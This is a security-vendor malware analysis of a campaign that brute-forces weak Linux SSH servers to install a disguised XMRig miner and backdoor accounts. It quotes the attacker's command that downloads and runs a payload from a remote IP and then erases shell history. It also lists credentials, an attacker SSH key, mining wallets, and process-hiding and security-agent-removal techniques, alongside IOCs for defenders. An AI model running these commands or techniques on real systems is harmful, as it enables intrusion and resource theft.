CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of malware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH account.

When looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS Bot or CoinMiner. DDoS Bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1] and ChinaZ DDoS Bot [2] were installed respectively. The installation of XMRig CoinMiner was covered in tandem with the SHC malware [3].

This blog post will cover one of the various attack cases where CoinMiner is installed. The main features of this attack campaign include its relatively recent start, use of SHC, and the inclusion of a personalized message that says “KONO DIO DA” from the threat actor.

Figure 1. Message from the malware creator

1. Dictionary Attack Against Linux SSH Servers

Poorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux servers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is prone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the user account registered to the system to do so.

If simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force or a dictionary attack, allowing them to execute malicious commands. When Linux SSH servers that are poorly managed are attacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the known account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.

The following is a list of IDs/PWs used in those attacks.

ID PW Attacker
root . 23.224.232[.]68
root 23.224.232[.]68
root P@ssw0rd 23.224.232[.]68
admin password1! 23.224.232[.]68
web 123456 23.224.232[.]68
tomcat tomcat 23.224.232[.]68
centos Huawei@123 23.224.232[.]68
oracle Huawei@123 23.224.232[.]68
Table 1. Attack sources and account credentials used for the “KONO DIO DA” attacks

2. Cases of KONO DIO DA Attacks – Latest

Figure 2. Latest attack flow

The threat actor used the commands below to download and execute malware after successfully logging in. “uname -a” and “nproc” are commands that output the system information. It is assumed that these are used so that the threat actor can check which systems have a CoinMiner installed on them later on. There are also commands that delete the history of these commands after the malware has been executed.

# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history

The downloaded “am” file is malware that has been developed with SHC, and functions as a downloader. The fact that it was developed with SHC means that the original malware is actually a Bash script that has been converted into the ELF format. Details regarding SHC have been covered previously in the blog post below.

Figure 3. Decrypted Bash script

“am” is a simple downloader that downloads and executes “nw”, while “nw” is also a downloader that ultimately downloads and executes additional malware. The “nw” Bash script forcefully terminates and deletes the CoinMiner it used in the past along with its other malware before downloading and executing a compressed file with the XMRig and Bash script malware.

Figure 4. Main routine of nw Bash script

The compressed file includes the XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only”, the configuration file “config.json”, and 3 Bash script malware.

Figure 5. XMRig and Bash malware contained inside the compressed file

“nw” executes the “start” Bash script inside the compressed file, and “start” is responsible for the function that executes the “admin” Bash script. “admin” is responsible for registering the cron task, which executes the “root.sh” Bash script and “root.sh” every minute.

Figure 6. Registered cron task, “nano.backup”

“root.sh” executes XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only” that exists in the same path, before reading and using the configuration information required for mining from “config.json” which also exists in the same path. XMRig is executed under the disguised name of a normal process, “dbus-daemon”. Not only does it use its process name, but the arguments used upon execution are also mimicked, making it difficult for ordinary users to notice that a CoinMiner is currently running.

Mining Pool Wallet Password
xmr.doi-2020[.]net:14444 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ.worker01/bolus.eu@gmail.com worker01
val.doi-2020[.]net:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF x
142.202.242[.]45:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF x
pool.hashvault[.]pro:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF x
AS.doi-2020[.]net:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ x
139.99.123[.]196:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ x
pool.supportxmr[.]com:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF x
Table 2. Threat actor’s XMRig mining information
Figure 7. Monero coin mining packet

3. Cases of KONO DIA DA Attacks – Past

Figure 8. Past attack flow

Looking at past cases, it is apparent that the malware used in recent attacks has fewer features than before. The initially installed file cannot be confirmed, but “hoze” is a Bash script that performs the same functions as “nw”. “hoze” decompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that provides various additional features such as installing the XMRig CoinMiner.

Unlike the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider variety of features during their past attacks. The feature to maintain persistence was one of the main features they used. A “key” file existed in the compressed file.

Figure 9. Malware inside the compressed file used in past attacks

The following public SSH key was included in the “key” file. “init0” removes the existing “~/.ssh/authorized_keys” file and copies the “key” file that was inside the compressed file to that directory.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key

When logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys. To accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server. Afterward, the private key can be used to log into the client. In this case, the threat actor creates and registers their public key, which is the “key” file, to the “~/.ssh/authorized_keys” path. This allows them to use their private key later to log into the infected system.

Besides this, the threat actor can use the usermod command to add an account called “cheeki”. If the infected system has an account called “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, then the password is changed by the threat actor. This process is a persistence maintenance technique that creates a backdoor account on an infected system, allowing the threat actor to log in at a later date.

Figure 10. Routine used to maintain persistence

The “uninstall.sh” Bash script is responsible for removing the Ali cloud shield (Ann Knight) of the security service Alibaba Cloud. kinsing is a malware strain that is primarily used to remove Aegis. kinsing installs a Bash script that is capable of removing not only Aegis, but Tencent QCloud Monitor as well. It is also capable of disabling SELinux and AppArmor.

Figure 11. Routine to remove Aegis

Contrary to its name, “init.sh” is an SHC ELF file, and its simple structure is shown below. It is responsible for executing the CoinMiner and hiding the process. To do this, it creates the “/var/tmp/…” directory and uses the mount command to bind the directory to the /proc file system on the PID of the miner process. This is one of the previously known methods used to conceal processes. The threat actor uses this simple command instead of a rootkit to conceal the CoinMiner’s process.

Figure 12. Command to hide the PID of the miner

The aforementioned scripts and SHC ELF files perform supplementary roles, while “secure” is responsible for the main features. “secure” is an ELF file built with SHC, and is responsible for executing XMRig CoinMiner, installing the latest XMRig, and registering itself in the cron task. Therefore, as it is executed regularly through the cron task, if XMRig does not exist on the system, the latest version is downloaded to start mining for cryptocurrency on the infected system.

Figure 13. Main routine of “secure”

When looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS Bot or CoinMiner. Most CoinMiner attack cases have no notable characteristics, as XMRig is simply installed to mine Monero Coins. However, the “KONO DIO DA” threat actors use additional malware and various analysis disruption techniques in addition to installing XMRig, and these attacks were confirmed relatively recently.

Mining Pool Wallet Password
5.9.157[.]2:10380 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C x
2.58.149[.]237:2007 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C x
Table 3. Threat actor’s XMRig mining information – Past

4. Conclusion

Attack campaigns where a CoinMiner is installed on poorly managed Linux SSH servers have been occurring persistently since the past. The “KONO DIO DA” attack campaign covered here maintains its persistence by registering a backdoor SSH account in addition to installing the XMRig CoinMiner. If CoinMiner is installed, system resources are used to mine Monero Coins for the threat attack, and the threat actor can later log in through the backdoor SSH account to either install additional malware, steal information from the system, or perform various other malicious behaviors.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.

File Detection
– CoinMiner/Text.Config (2023.04.24.02)
– Downloader/Linux.Agent.1011056 (2023.04.24.02)
– Downloader/Linux.Agent.11344 (2023.04.24.02)
– Downloader/Shell.Agent.SC187868 (2023.04.24.02)
– Downloader/Shell.Agent.SC187872 (2023.04.24.02)
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Trojan/Linux.Agent.1010416 (2023.04.24.02)
– Trojan/Linux.Hider.1008280 (2023.04.24.02)
– Trojan/Shell.Agent.SC187867 (2023.04.24.02)
– Trojan/Shell.Agent.SC187876 (2023.04.24.02)
– Trojan/Shell.Runner.SC187869 (2023.04.24.02)
– Trojan/Shell.Runner.SC187871 (2023.04.24.02)

IOC
MD5
– ea30afd4f65f8866bebcaf92168f3241: Latest version of the downloader (am)
– 1192697ed3d2302bec3ee828c154e300: Latest version of the downloader Bash script (nw)
– 1db93cb95e409769561efb66e4fd5c72: Bash script (start)
– 6e9001516053770f6dd645954240bced: Bash script (admin)
– a978aec11a072855e2cfba593160886e: Bash script (root.sh)
– 4f1661d873cef8a3fa3ca34080816e87: XMRig CoinMiner(dbus-daemon –system –address=systemd_ –nofork —nopidfile –systemd-activation –syslog-only)
– 20ac8a45d129e3ce3444494d9672692c: XMRig Configuration File (config.json)
– 5c1ad4a8335fc406040a070b2be661ff: Past version of the downloader Bash script (hoze)
– 90948ae9f7d167d4016c7a56477a67b3: Past version of the downloader (init0)
– 1932d2e4081f6dd5c8b32d29b1ab5caf: Bash script (init.sh)
– e4cc1a7f992909e8509520fdd6c9a3f7: Bash script (uninstall.sh)
– bb497b86c26893e10432781c6550e5fc: Bash script (secure)
– 254784ca05bdd3928d7889d0ea3195ab: XMRig CoinMiner (xri)
– 5f89f90efd1568618e72bb30b8e44fce: XMRig Configuration File (config.json)
– 5aa60757665510b2c8e9bb924c2b40ef: XMRig Configuration File (config32.json)

Download URLs
– hxxp://46.41.150[.]129/.bo/am (Dictionary attack)
– hxxp://46.41.150[.]129/.bo/nw: Latest version of the downloader (am)
– hxxp://46.41.150[.]129/.js/new-xmrig.tgz: Latest version of the downloader (w)
– hxxp://2.58.149[.]237:6972/hoze: Past version of the downloader
– hxxp://2.58.149[.]237:6972/xri2.tar: Past version of the CoinMiner (hoze)
– hxxp://141.95.19[.]91:8080/xri/xri: Downloads XMRig CoinMiner
– hxxp://141.95.19[.]91:8080/xri/config.json: Downloads XMRig configuration file

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/51908/